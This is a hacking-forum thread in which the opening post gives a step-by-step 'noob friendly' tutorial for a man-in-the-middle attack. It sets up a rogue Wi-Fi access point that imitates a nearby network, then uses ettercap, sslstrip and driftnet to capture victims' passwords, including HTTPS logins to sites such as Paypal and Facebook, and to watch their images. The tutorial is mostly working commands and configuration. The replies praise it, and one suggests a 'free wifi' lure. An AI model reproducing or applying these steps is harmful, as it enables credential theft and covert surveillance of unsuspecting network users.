+- Sinisterly (https://sinister.ly)
+-- Forum: Hacking (https://sinister.ly/Forum-Hacking)
+--- Forum: Network Hacking (https://sinister.ly/Forum-Network-Hacking)
+--- Thread: ADVANCED PASSWORD SNIFFING (NOOB FRIENDLY) rogue ap+ettercap+ssl strip+driftnet(no additional router required) (/Thread-ADVANCED-PASSWORD-SNIFFING-NOOB-FRIENDLY-rogue-ap-ettercap-ssl-strip-driftnet-no-additional-router-required)
ADVANCED PASSWORD SNIFFING (NOOB FRIENDLY) rogue ap+ettercap+ssl strip+driftnet(no additional router required) - papamoney - 06-22-2011
hello friends..this is my first tutorial on advanced password sniffing
this tutorial is based on creating rogue AP(ACCESS POINT)..
NOTE: THIS IS NOT ORDINARY AP SNIFFING .U CAN SNIFF HTTPS PASSWORDS AND ALL KIND OF PASSWORDS. SO FOLLOW THIS TUTORIAL TILL THE END.
SO ...
1) THINGS U NEED
a)ESSID OF ANY NETWORK SURROUNDING YOU ..MAKE SURE MANT USERS CONNECT TO IT..
b) OPERATING SYSTEM :- BT4,UBUNTU.AND OTHER LINUX DISTRIBUTIONS..
c)TWO WORKING NETWORK INTERFACE ,A WIRELESS AND A ETHERNET CONNECTION(WITH INTERNET WOULD BE GREAT)
2) TOOLS REQUIRED
Aircrack-ng
SSLstrip
Ettercap/Ettercap-GTK and Ettercap-Common
and Driftnet ,this is not necessary but would be great if it works properly
3) NOW INSTALLING THESE
open terminal window
sudo apt-get install aircrack-ng
sudo apt-get install driftnet
sudo apt-get install ettercap
or
sudo apt-get install ettercap-gtk(GUI)
for ssl strip ..
do the following
in terminal type:
cd Documents
wget http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.9.tar.gz
tar zxvf sslstrip-0.9.tar.gz
cd sslstrip-0.9
sudo python ./setup.py install
that's it...u r done with the installation
now time to configure ur dhcp.conf file ..basically this file contains nameserver and u need to configure it to create new nameserver..
NOW OPEN GEDIT AND PASTE THIS
Quote:ddns-update-style ad-hoc;
default-lease-time 600;
max-lease-time 7200;
authoritative;
subnet 192.168.2.128 netmask 255.255.255.128 {
option subnet-mask 255.255.255.128;
option broadcast-address 192.168.2.255;
option routers 192.168.2.129;
option domain-name-servers [ADD YOUR DNS HERE, REMOVE BRACKETS];
range 192.168.2.130 192.168.2.140;
}
*** ADD YOUR DNS IN THE BRACKET DONT FORGET IT***
save this as dhcp.conf on desktop
now time to sniff :thumbs:
in cmd enter into root mode by typing : sudo su
now
airmon-ng start wlan0
and see the result..note in which mode monitor is enabled..generally its mon0.
To give our AP a name we use Airbase-ng [part of the aircrack-ng suite], we will be making an unsecured AP called 'VOLSBB'. mon0 is my ALFA in monitoring mode and can be substituted for whatever device name you want but it must be a packet injection support device in monitor mode!
airbase-ng -e VOLSBB mon0
So we have a ESSID lets add the netmask and gateway. [at0 is a replicated Ethernet device,,MAY BE URS IS ETH0]:
ifconfig at0 up
ifconfig at0 192.168.2.129 netmask 255.255.255.128
route add -net 192.168.2.128 netmask 255.255.255.128 gw 192.168.2.129
We need to make sure that connections to the network are assigned IP addresses so we point the dhcpd3 server to our new config file.
mkdir -p /var/run/dhcpd && chown dhcpd:dhcpd /var/run/dhcpd
You may get an error saying that dhcpd is not a valid user, go to 'users and groups' on your start menu and add a user group called 'dhcpd' then try.
echo > '/var/lib/dhcp3/dhcpd.leases'
[change /home/semtex-primed/documents/ to the path of your file.]
dhcpd3 -d -f -cf /home/Semtex-Primed/Documents/dhcpd.conf -pf /var/run/dhcpd/dhcpd.pid at0
Now to make sure that the people connecting to the internet while on the network we need to make sure that the server is routed properly when running. They need to be online on our network otherwise were not sniffing any passwords!
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
This part below you need to make sure you have your 2nd interface [none sniffing one] connected to the net and swap 'wlan1' for it below.
iptables --table nat --append POSTROUTING --out-interface wlan1 -j MASQUERADE
iptables --append FORWARD --in-interface at0 -j ACCEPT
Next command needs changing, make sure 192.168.1.254 is changed to the default gateway of the network your using!
iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.254
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
Sniffing!
Now we have a perfectly usable software AP that can connect to the internet. This is a long process to go through but the rewards are huge. We have successfully set the AP up and now just need a way of monitoring it using Ettercap. We will be using Driftnet and SSLstrip too.
Setup IP forwarding:
echo 1 > /proc/sys/net/ipv4/ip_forward
I will assume you have or know how to setup Ettercap. Below will start it monitoring the at0 interface. -T means text interface withing teminal, -q means quiet mode, -p makes sure its not in promiscuous mode and -i tells ettercap which interface to monitor.
ettercap -T -q -p -i at0 // //
Next we will setup SSLstrip, which means if the 'victims' logs into a SSL login page then we will still get the passwords. examples include Paypal, Youtube, Facebook, etc...
Open a new Terminal and type:
sslstrip -a -k -f
Now the cool stuff, Driftnet, this tool will display pictures/video stills of what the person is looking at online! Great little tool!
Open up a 3rd 'sniffing terminal' and type:
driftnet -v -i at0
-v = verbose mode
-i = interface to monitor on.
Congrats!!! u r done all u need is another person connecting to ur AP ..!!!!!:thumbs:
FEEL FREE TO ASK ANYTHING RELATED TO THIS
RE: ADVANCED PASSWORD SNIFFING (NOOB FRIENDLY) rogue ap+ettercap+ssl strip+driftnet(no additional router required) - deathknight - 06-22-2011
Very Nice and detailed tutorial. I liked it :thumbs:. But.....
(06-22-2011, 08:58 AM)papamoney Wrote: NOTE: THIS IS NOT ORDINARY AP SNIFFING .U CAN SNIFF HTTPS PASSWORDS AND ALL KIND OF PASSWORDS. SO FOLLOW THIS TUTORIAL TILL THE END.
To be honest, this line seems to give a false idea that we cant sniff HTTPS using normal/ordinary AP sniffing. You can easily sniff all the data, https and everything just by connecting to AP and using ettercap with sslstrip.
But wouldnt it be easier and simpler just to use your own normal AP making it unsecured and naming it to "something free wifi etc" and connect to that AP and start sniffing with ettercap with sslstrip? .... easier and shorter way.
RE: ADVANCED PASSWORD SNIFFING (NOOB FRIENDLY) rogue ap ettercap ssl strip driftnet(no additional router required) - papamoney - 06-22-2011
(06-22-2011, 02:10 PM)deathknight Wrote: Very Nice and detailed tutorial. I liked it :thumbs:. But.....Ya It would be easier but i also kept in mind about the students who use hostel wifi and believe me the students do not connect to unknown wifi ..so this tutorial is mainly for them who have just hostel wifi etc..and no other essid..newaz i made it for understanding purpose there are many ways...i just favour this:p
(06-22-2011, 08:58 AM)papamoney Wrote: NOTE: THIS IS NOT ORDINARY AP SNIFFING .U CAN SNIFF HTTPS PASSWORDS AND ALL KIND OF PASSWORDS. SO FOLLOW THIS TUTORIAL TILL THE END.
To be honest, this line seems to give a false idea that we cant sniff HTTPS using normal/ordinary AP sniffing. You can easily sniff all the data, https and everything just by connecting to AP and using ettercap with sslstrip.
But wouldnt it be easier and simpler just to use your own normal AP making it unsecured and naming it to "something free wifi etc" and connect to that AP and start sniffing with ettercap with sslstrip? .... easier and shorter way.
RE: ADVANCED PASSWORD SNIFFING (NOOB FRIENDLY) rogue ap+ettercap+ssl strip+driftnet(no additional router required) - J2ack - 06-22-2011
Awesome, I liked it dude
RE: ADVANCED PASSWORD SNIFFING (NOOB FRIENDLY) rogue ap+ettercap+ssl strip+driftnet(no additional router required) - papamoney - 06-22-2011
(06-22-2011, 07:34 PM)J2ack Wrote: Awesome, I liked it dude
thnx
..u should atleat try this once...
RE: ADVANCED PASSWORD SNIFFING (NOOB FRIENDLY) rogue ap+ettercap+ssl strip+driftnet(no additional router required) - WoosTy - 06-22-2011
thanks man, nice post